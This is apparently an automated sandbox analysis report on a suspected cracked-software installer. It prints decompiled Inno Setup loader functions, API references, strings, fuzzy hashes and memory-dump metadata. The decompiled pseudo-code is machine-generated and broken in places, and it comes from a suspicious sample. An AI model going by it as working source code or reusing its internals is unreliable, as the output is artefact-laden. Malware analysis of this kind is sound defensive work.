Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401494 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401494(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E004012E4(0x40d43c, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}

0x00401498
0x0040149a
0x0040149c
0x0040149e
0x004014b2
0x004014b7
0x004014b9
0x004014bd
0x004014c5
0x004014cb
0x004014d7
0x004014dc
0x004014dc
0x004014e1
0x004014ea
0x004014f1
0x004014fd
0x00401504
0x00000000
0x00401504
0x004014f1
0x0040150a

APIs

VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0040D44C,?,?,?,00401800), ref: 004014B2
VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0040D44C,?,?,?,00401800), ref: 004014D7
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0040D44C,?,?,?,00401800), ref: 004014FD

Strings

<;h, xrefs: 004014E5

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Virtual$Alloc$Free
String ID: <;h
API String ID: 3668210933-2917909428
Opcode ID: 56db38c19b6ceeb02a8758feba204cd8fc02d770c86dc196ff6e02dede4f66a7
Instruction ID: ff1ecb011178932a4bd5126b8dbb81990992756d7102c6e57c955bebf8b74951
Opcode Fuzzy Hash: 56db38c19b6ceeb02a8758feba204cd8fc02d770c86dc196ff6e02dede4f66a7
Instruction Fuzzy Hash: E4F0C8717403106AEB316EA94C85F533AD89F85754F1040BAFA0DFF3DAD6745800826C

Uniqueness

Uniqueness Score: -1.00%

Function 00403018 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00403018(void* __esi, intOrPtr _a4, signed int _a8) {
				signed int _v12;
				void* _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				void* _t32;
				void* _t33;
				void* _t43;
				void* _t44;

				if(( *(_a4 + 4) & 0x00000006) != 0) {
					__eflags = 0;
					return 0;
				} else {
					__eax = E0040285C(__eax);
					__edx = _a8;
					_push(0);
					_push(__eax);
					_push(0x40303c);
					_push(_a8);
					L004011CC();
					__ebx = _v12;
					__eflags =  *__ebx - 0xeedface;
					__edx =  *(__ebx + 0x14);
					__eax =  *(__ebx + 0x18);
					if( *__ebx == 0xeedface) {
						L38:
						__eax = E00402BE8(__eax, __esi);
						__ecx =  *0x40d000; // 0x406120
						__eflags = __ecx;
						if(__ecx != 0) {
							__eax =  *__ecx();
						}
						__ecx = _v12;
						__eax = 0xd9;
						__edx =  *(__ecx + 0x14);
						 *__esp =  *(__ecx + 0x14);
						_pop( *0x40d028);
						 *0x40d020 = 0xd9;
						__eflags =  *0x40d030;
						if( *0x40d030 == 0) {
							goto L46;
						} else {
							__eflags =  *0x40d414 - 1;
							if(__eflags < 0) {
								L58:
								ExitProcess( *0x40d020);
							} else {
								if(__eflags == 0) {
									goto L46;
								} else {
									__eax = 0xd9;
									__eflags = 0xd9;
									if(0xd9 != 0) {
										while(1) {
											L46:
											__eax =  *0x40d024; // 0x4039e8
											__eax = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												break;
											}
											__edx = 0;
											 *0x40d024 = 0;
											__eax =  *__eax();
										}
										__eflags =  *0x40d028;
										if( *0x40d028 != 0) {
											__eax =  *0x40d020; // 0x0
											__ebx = "  at 00000000";
											__ecx = 0xa;
											do {
												__edx = 0;
												_t15 = __eax % 0xa;
												__eax = __eax / 0xa;
												__edx = _t15;
												__dl = __dl + 0x30;
												 *__ebx = __dl;
												__ebx = __ebx - 1;
												__eflags = __eax;
											} while (__eax != 0);
											__ebx = 0x40c030;
											__eax =  *0x40d028; // 0x0
											__eax = __eax - 0x401178;
											__eflags = __eax;
											do {
												__edx = __eax;
												__edx = __eax & 0x0000000f;
												__dl =  *((intOrPtr*)(__edx + 0x403e1c));
												 *__ebx =  *((intOrPtr*)(__edx + 0x403e1c));
												__ebx = __ebx - 1;
												__eax = __eax >> 4;
												__eflags = __eax;
											} while (__eax != 0);
											__eflags =  *0x40d031;
											if( *0x40d031 != 0) {
												__eax = 0x40d204;
												__edx = "Runtime error     at 00000000";
												E00403FE4(0x40d204, "Runtime error     at 00000000") = E00403F67();
											} else {
												__eax = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
											}
										}
										0x40d038 = E00403CC8(0x40d038);
										0x40d204 = E00403CC8(0x40d204);
										__eax = E004019DC();
										__eflags =  *0x40d414;
										if( *0x40d414 == 0) {
											__eax = E004030B4();
											goto L58;
										}
									}
								}
							}
						}
						__eax = E004030B4();
						 *0x40d414 = 0;
						__eax =  *0x40d020; // 0x0
						__eax =  ~__eax;
						asm("sbb eax, eax");
						__eax = __eax + 1;
						__eflags = __eax;
						__esi =  *0x40d40c; // 0x0
						__ebx =  *0x40d408; // 0x0
						__ebp =  *0x40d404; // 0x0
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					} else {
						__edx =  *0x40d00c; // 0x40602c
						__eflags = __edx;
						if(__edx == 0) {
							L1:
							_t35 = _v12;
							_t21 =  *_v12;
							_t43 = _t21 - 0xc0000092;
							if(_t43 > 0) {
								__eflags = _t21 - 0xc0000096;
								if(__eflags > 0) {
									_t22 = _t21 - 0xc00000fd;
									__eflags = _t22;
									if(_t22 == 0) {
										_t23 = 0xca;
									} else {
										__eflags = _t22 == 0x3d;
										if(_t22 == 0x3d) {
											_t23 = 0xd9;
										} else {
											goto L32;
										}
									}
								} else {
									if(__eflags == 0) {
										_t23 = 0xda;
									} else {
										_t27 = _t21 - 0xc0000093;
										__eflags = _t27;
										if(_t27 == 0) {
											goto L27;
										} else {
											_t28 = _t27 - 1;
											__eflags = _t28;
											if(_t28 == 0) {
												_t23 = 0xc8;
											} else {
												__eflags = _t28 == 1;
												if(_t28 == 1) {
													_t23 = 0xd7;
												} else {
													goto L32;
												}
											}
										}
									}
								}
							} else {
								if(_t43 == 0) {
									L24:
									_t23 = 0xcf;
								} else {
									_t44 = _t21 - 0xc000008e;
									if(_t44 > 0) {
										__eflags = _t21 + 0x3fffff71 - 2;
										if(__eflags < 0) {
											goto L24;
										} else {
											if(__eflags == 0) {
												_t23 = 0xcd;
											} else {
												goto L32;
											}
										}
									} else {
										if(_t44 == 0) {
											_t23 = 0xc8;
										} else {
											_t32 = _t21 - 0xc0000005;
											if(_t32 == 0) {
												_t23 = 0xd8;
											} else {
												_t33 = _t32 - 0x87;
												if(_t33 == 0) {
													_t23 = 0xc9;
												} else {
													if(_t33 == 1) {
														L27:
														_t23 = 0xce;
													} else {
														L32:
														_t23 = 0xd9;
													}
												}
											}
										}
									}
								}
							}
							return E00402F6C(_t23 & 0x000000ff,  *((intOrPtr*)(_t35 + 0xc)));
						} else {
							__eax = __ebx;
							__eax =  *__edx();
							__eflags = __eax;
							if(__eax == 0) {
								goto L1;
							} else {
								__edx =  *(__ebx + 0xc);
								goto L38;
							}
						}
					}
				}
			}

0x00403023
0x00403090
0x00403092
0x00403025
0x00403025
0x0040302a
0x0040302e
0x00403030
0x00403031
0x00403036
0x00403037
0x0040303c
0x00403040
0x00403046
0x00403049
0x0040304c
0x0040306b
0x0040306b
0x00403070
0x00403076
0x00403078
0x0040307a
0x0040307a
0x0040307c
0x00403080
0x00403085
0x00403088
0x00403e41
0x00403d04
0x00403d09
0x00403d10
0x00000000
0x00403d12
0x00403d12
0x00403d19
0x00403ddf
0x00403de5
0x00403d1f
0x00403d1f
0x00000000
0x00403d21
0x00403d21
0x00403d21
0x00403d23
0x00403d29
0x00403d29
0x00403d29
0x00403d2e
0x00403d2e
0x00403d30
0x00000000
0x00000000
0x00403d32
0x00403d34
0x00403d3a
0x00403d3a
0x00403d3e
0x00403d45
0x00403d47
0x00403d4c
0x00403d51
0x00403d56
0x00403d56
0x00403d58
0x00403d58
0x00403d58
0x00403d5a
0x00403d5d
0x00403d5f
0x00403d60
0x00403d60
0x00403d64
0x00403d69
0x00403d6e
0x00403d6e
0x00403d73
0x00403d73
0x00403d75
0x00403d78
0x00403d7e
0x00403d80
0x00403d81
0x00403d81
0x00403d81
0x00403d86
0x00403d8d
0x00403da4
0x00403da9
0x00403db3
0x00403d8f
0x00403d9d
0x00403d9d
0x00403d8d
0x00403dbd
0x00403dc7
0x00403dcc
0x00403dd1
0x00403dd8
0x00403dda
0x00000000
0x00403dda
0x00403dd8
0x00403d23
0x00403d1f
0x00403d19
0x00403dea
0x00403def
0x00403df6
0x00403dfb
0x00403dfd
0x00403dff
0x00403dff
0x00403e06
0x00403e0c
0x00403e12
0x00403e18
0x00403e18
0x00403e19
0x0040304e
0x0040304e
0x00403054
0x00403056
0x00402f78
0x00402f7b
0x00402f7e
0x00402f80
0x00402f85
0x00402fb3
0x00402fb8
0x00402fcb
0x00402fcb
0x00402fd0
0x00403001
0x00402fd2
0x00402fd2
0x00402fd5
0x00402ffd
0x00402fd7
0x00000000
0x00402fd7
0x00402fd5
0x00402fba
0x00402fba
0x00402ff9
0x00402fbc
0x00402fbc
0x00402fbc
0x00402fc1
0x00000000
0x00402fc3
0x00402fc3
0x00402fc3
0x00402fc4
0x00402fd9
0x00402fc6
0x00402fc6
0x00402fc7
0x00402fed
0x00402fc9
0x00000000
0x00402fc9
0x00402fc7
0x00402fc4
0x00402fc1
0x00402fba
0x00402f87
0x00402f87
0x00402fe5
0x00402fe5
0x00402f89
0x00402f89
0x00402f8e
0x00402faa
0x00402fad
0x00000000
0x00402faf
0x00402faf
0x00402fe1
0x00402fb1
0x00000000
0x00402fb1
0x00402faf
0x00402f90
0x00402f90
0x00402fe9
0x00402f92
0x00402f92
0x00402f97
0x00402ff5
0x00402f99
0x00402f99
0x00402f9e
0x00402fdd
0x00402fa0
0x00402fa1
0x00402ff1
0x00402ff1
0x00402fa3
0x00403005
0x00403005
0x00403005
0x00402fa1
0x00402f9e
0x00402f97
0x00402f90
0x00402f8e
0x00402f87
0x00403015
0x0040305c
0x0040305c
0x0040305e
0x00403060
0x00403062
0x00000000
0x00403068
0x00403068
0x00000000
0x00403068
0x00403062
0x00403056
0x0040304c

APIs

RtlUnwind.KERNEL32(?,0040303C,00000000,00000000), ref: 00403037

Strings

,`@, xrefs: 0040304E
a@, xrefs: 00403070

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Unwind
String ID: a@$,`@
API String ID: 3419175465-3299659662
Opcode ID: 74c36dcaebc9beb569fc9a652e38c4b91acfc0ad3c1c730ca21132f2aeeaf1ad
Instruction ID: e18fd8dce0ff00c2f0e26d0eabb8ee8c5bb09bfe6675b42a72717897def5721e
Opcode Fuzzy Hash: 74c36dcaebc9beb569fc9a652e38c4b91acfc0ad3c1c730ca21132f2aeeaf1ad
Instruction Fuzzy Hash: 951182352042029BD724DE18CA89B2777B5AB44744F24C13AA404AB3DAC77CDC81A769

Uniqueness

Uniqueness Score: -1.00%

Function 0040A160 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
windowCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040A160(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _t17;
				intOrPtr _t22;

				_push(0);
				_push(_t22);
				_push(0x40a1b0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				E0040322C( &_v8, "The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n\r\nFor more detailed information, please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				MessageBoxA(0, E00403414(_v8), "Setup", 0x10);
				_pop(_t17);
				 *[fs:eax] = _t17;
				_push(E0040A1B7);
				return E00403198( &_v8);
			}

0x0040a163
0x0040a16a
0x0040a16b
0x0040a170
0x0040a173
0x0040a17e
0x0040a195
0x0040a19c
0x0040a19f
0x0040a1a2
0x0040a1af

APIs

MessageBoxA.USER32 ref: 0040A195

Strings

The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 0040A179
Setup, xrefs: 0040A185

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Message
String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
API String ID: 2030045667-3271211647
Opcode ID: 2fcb4469882f519d07bdc4c54c2b2bf709aeffd752a3b32377c5605777b8a92b
Instruction ID: 75c34cc78b7437cb0ca87fafc7654258806437370cb031ed823535619a0dd887
Opcode Fuzzy Hash: 2fcb4469882f519d07bdc4c54c2b2bf709aeffd752a3b32377c5605777b8a92b
Instruction Fuzzy Hash: 8BE0E5302043087EE301EA629C03F5A7BACE7CAB04F600477F900B55C1C6786E10842D

Uniqueness

Uniqueness Score: -1.00%

Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030DC() {

				E00403094();
				 *0x40d014 = GetModuleHandleA(0);
				 *0x40d01c = GetCommandLineA();
				 *0x40d018 = 0xa;
				return 0x402e34;
			}

0x004030dc
0x004030e8
0x004030f3
0x004030f9
0x00403108

APIs

GetModuleHandleA.KERNEL32(00000000,0040AAE6), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,0040AAE6), ref: 004030EE

Strings

U1hd.@, xrefs: 00403103

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: U1hd.@
API String ID: 2123368496-2904493091
Opcode ID: 4ac654993ecb6f0c10b1cacd39e13426f3fb1ace3b4aa0046ecf3c9b516135ec
Instruction ID: daea45a2aa12e23edc1a75ca5ccfa9dec32d0aab9986280789c112b27ba3568a
Opcode Fuzzy Hash: 4ac654993ecb6f0c10b1cacd39e13426f3fb1ace3b4aa0046ecf3c9b516135ec
Instruction Fuzzy Hash: 3AC0027894134055D764AFF69E497047594A74930DF40443FA20C7A1F1D67C460A6BDD

Uniqueness

Uniqueness Score: -1.00%

Function 004099B0 Relevance: 5.0, APIs: 4, Instructions: 45
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004099B0(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00409470(_t9, _v8, _t19);
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}

0x004099b0
0x004099b7
0x004099ba
0x004099be
0x004099c1
0x00409a0f
0x00409a0f
0x00409a0f
0x004099c3
0x004099c4
0x004099c6
0x004099c6
0x004099c9
0x004099d6
0x004099d9
0x004099df
0x004099df
0x004099cb
0x004099cf
0x004099cf
0x004099e9
0x004099f0
0x00000000
0x00000000
0x004099f2
0x004099fa
0x00000000
0x00000000
0x004099fc
0x00409a04
0x00000000
0x00000000
0x00409a06
0x00409a07
0x00409a08
0x00000000
0x00000000
0x00000000
0x00409a08
0x00000000

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,0040B0C5,000000FA,00000032,0040B12C,00409E38,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004099CF
Sleep.KERNEL32(?,?,?,?,0000000D,?,0040B0C5,000000FA,00000032,0040B12C,00409E38,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004099DF
GetLastError.KERNEL32(?,?,?,0000000D,?,0040B0C5,000000FA,00000032,0040B12C,00409E38,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000), ref: 004099F2
GetLastError.KERNEL32(?,?,?,0000000D,?,0040B0C5,000000FA,00000032,0040B12C,00409E38,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000), ref: 004099FC

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: c7bd6a21121ddb9efccb4cc95de40b345340be1ee537211c691cca6293df28a9
Instruction ID: eb7512966d821cc35779f37d74516ce45850f6d6c39c5245c2e713911e3afcfa
Opcode Fuzzy Hash: c7bd6a21121ddb9efccb4cc95de40b345340be1ee537211c691cca6293df28a9
Instruction Fuzzy Hash: F9F0BBB27012986BCB24A5AE8C86A6FB348EAD1358710403FF504F7393D439DC0156A9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpPID: 5096, Parent PID: 5724COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	92

Executed Functions

Function 00490830 Relevance: 141.9, APIs: 22, Strings: 58, Instructions: 1920
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00490830(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v13;
				void* _v20;
				char _v24;
				char _v28;
				void* _v32;
				long _v36;
				char _v40;
				int _v44;
				int _v48;
				char _v52;
				int _v56;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				void* _t496;
				void* _t565;
				void* _t579;
				intOrPtr _t580;
				void* _t588;
				void* _t589;
				long _t623;
				int _t631;
				char* _t633;
				long _t637;
				long _t653;
				long _t664;
				long _t680;
				void* _t688;
				char* _t691;
				long _t695;
				void* _t703;
				long _t715;
				void* _t723;
				char* _t726;
				long _t730;
				long _t746;
				long _t757;
				void* _t759;
				long _t765;
				long _t781;
				long _t791;
				long _t803;
				long _t819;
				long _t830;
				long _t848;
				long _t874;
				long _t926;
				long _t970;
				long _t992;
				long _t1010;
				signed int _t1014;
				intOrPtr _t1018;
				signed int _t1019;
				intOrPtr _t1057;
				intOrPtr _t1075;
				void* _t1169;
				void* _t1170;
				void* _t1220;
				void* _t1221;
				void* _t1239;
				void* _t1240;
				intOrPtr _t1262;
				intOrPtr _t1268;
				intOrPtr _t1274;
				void* _t1275;
				void* _t1281;
				void* _t1424;
				void* _t1461;
				void* _t1484;
				void* _t1500;
				intOrPtr _t1567;
				void* _t1574;
				void* _t1583;
				long _t1640;
				intOrPtr _t1792;
				void* _t1866;
				void* _t1872;
				void* _t1891;
				void* _t1901;
				void* _t1907;
				void* _t1915;
				void* _t1925;
				void* _t1939;
				void* _t1949;
				char* _t1965;
				char* _t1966;
				void* _t1973;
				void* _t1976;

				_t1980 = __fp0;
				_t1975 = _t1976;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v72 = 0;
				_v76 = 0;
				_v80 = 0;
				_v84 = 0;
				_v88 = 0;
				_v12 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_t1964 = __edx;
				_t1280 = _a4;
				_push(_t1976);
				_push(0x491f21);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1976 + 0xffffffac;
				_t1973 =  *((intOrPtr*)(_a4 + 0xc)) - 1;
				_t1978 = _t1973;
				_v5 = 1;
				E00403684( *((intOrPtr*)(__edx + 0x10)), "FILEEXISTS");
				if(_t1973 != 0) {
					E00403684( *((intOrPtr*)(__edx + 0x10)), "DIREXISTS");
					if(__eflags != 0) {
						E00403684( *((intOrPtr*)(__edx + 0x10)), "FILEORDIREXISTS");
						if(__eflags != 0) {
							E00403684( *((intOrPtr*)(__edx + 0x10)), "GETINISTRING");
							if(__eflags != 0) {
								E00403684( *((intOrPtr*)(__edx + 0x10)), "GETINIINT");
								if(__eflags != 0) {
									E00403684( *((intOrPtr*)(__edx + 0x10)), "GETINIBOOL");
									if(__eflags != 0) {
										E00403684( *((intOrPtr*)(__edx + 0x10)), "INIKEYEXISTS");
										if(__eflags != 0) {
											E00403684( *((intOrPtr*)(__edx + 0x10)), "ISINISECTIONEMPTY");
											if(__eflags != 0) {
												E00403684( *((intOrPtr*)(__edx + 0x10)), "SETINISTRING");
												if(__eflags != 0) {
													E00403684( *((intOrPtr*)(__edx + 0x10)), "SETINIINT");
													if(__eflags != 0) {
														E00403684( *((intOrPtr*)(__edx + 0x10)), "SETINIBOOL");
														if(__eflags != 0) {
															E00403684( *((intOrPtr*)(__edx + 0x10)), "DELETEINIENTRY");
															if(__eflags != 0) {
																E00403684( *((intOrPtr*)(__edx + 0x10)), "DELETEINISECTION");
																if(__eflags != 0) {
																	E00403684( *((intOrPtr*)(__edx + 0x10)), "GETENV");
																	if(__eflags != 0) {
																		E00403684( *((intOrPtr*)(__edx + 0x10)), "GETCMDTAIL");
																		if(__eflags != 0) {
																			E00403684( *((intOrPtr*)(__edx + 0x10)), "PARAMCOUNT");
																			if(__eflags != 0) {
																				E00403684( *((intOrPtr*)(__edx + 0x10)), "PARAMSTR");
																				if(__eflags != 0) {
																					E00403684( *((intOrPtr*)(__edx + 0x10)), "ADDBACKSLASH");
																					if(__eflags != 0) {
																						E00403684( *((intOrPtr*)(__edx + 0x10)), "REMOVEBACKSLASH");
																						if(__eflags != 0) {
																							E00403684( *((intOrPtr*)(__edx + 0x10)), "REMOVEBACKSLASHUNLESSROOT");
																							if(__eflags != 0) {
																								E00403684( *((intOrPtr*)(__edx + 0x10)), "ADDQUOTES");
																								if(__eflags != 0) {
																									E00403684( *((intOrPtr*)(__edx + 0x10)), "REMOVEQUOTES");
																									if(__eflags != 0) {
																										E00403684( *((intOrPtr*)(__edx + 0x10)), "GETSHORTNAME");
																										if(__eflags != 0) {
																											E00403684( *((intOrPtr*)(__edx + 0x10)), "GETWINDIR");
																											if(__eflags != 0) {
																												E00403684( *((intOrPtr*)(__edx + 0x10)), "GETSYSTEMDIR");
																												if(__eflags != 0) {
																													E00403684( *((intOrPtr*)(__edx + 0x10)), "GETSYSWOW64DIR");
																													if(__eflags != 0) {
																														E00403684( *((intOrPtr*)(__edx + 0x10)), "GETSYSNATIVEDIR");
																														if(__eflags != 0) {
																															E00403684( *((intOrPtr*)(__edx + 0x10)), "GETTEMPDIR");
																															if(__eflags != 0) {
																																E00403684( *((intOrPtr*)(__edx + 0x10)), "STRINGCHANGE");
																																if(__eflags != 0) {
																																	E00403684( *((intOrPtr*)(__edx + 0x10)), "STRINGCHANGEEX");
																																	if(__eflags != 0) {
																																		_t496 = E00403684( *((intOrPtr*)(__edx + 0x10)), "USINGWINNT");
																																		if(__eflags != 0) {
																																			E00403684( *((intOrPtr*)(__edx + 0x10)), "FILECOPY");
																																			if(__eflags != 0) {
																																				E00403684( *((intOrPtr*)(__edx + 0x10)), "CONVERTPERCENTSTR");
																																				if(__eflags != 0) {
																																					E00403684( *((intOrPtr*)(__edx + 0x10)), "REGKEYEXISTS");
																																					if(__eflags != 0) {
																																						E00403684( *((intOrPtr*)(__edx + 0x10)), "REGVALUEEXISTS");
																																						if(__eflags != 0) {
																																							E00403684( *((intOrPtr*)(__edx + 0x10)), "REGDELETEKEYINCLUDINGSUBKEYS");
																																							if(__eflags != 0) {
																																								E00403684( *((intOrPtr*)(__edx + 0x10)), "REGDELETEKEYIFEMPTY");
																																								if(__eflags != 0) {
																																									E00403684( *((intOrPtr*)(__edx + 0x10)), "REGDELETEVALUE");
																																									if(__eflags != 0) {
																																										E00403684( *((intOrPtr*)(__edx + 0x10)), "REGGETSUBKEYNAMES");
																																										if(__eflags != 0) {
																																											E00403684( *((intOrPtr*)(__edx + 0x10)), "REGGETVALUENAMES");
																																											if(__eflags != 0) {
																																												E00403684( *((intOrPtr*)(__edx + 0x10)), "REGQUERYSTRINGVALUE");
																																												if(__eflags != 0) {
																																													E00403684( *((intOrPtr*)(__edx + 0x10)), "REGQUERYMULTISTRINGVALUE");
																																													if(__eflags != 0) {
																																														E00403684( *((intOrPtr*)(__edx + 0x10)), "REGQUERYDWORDVALUE");
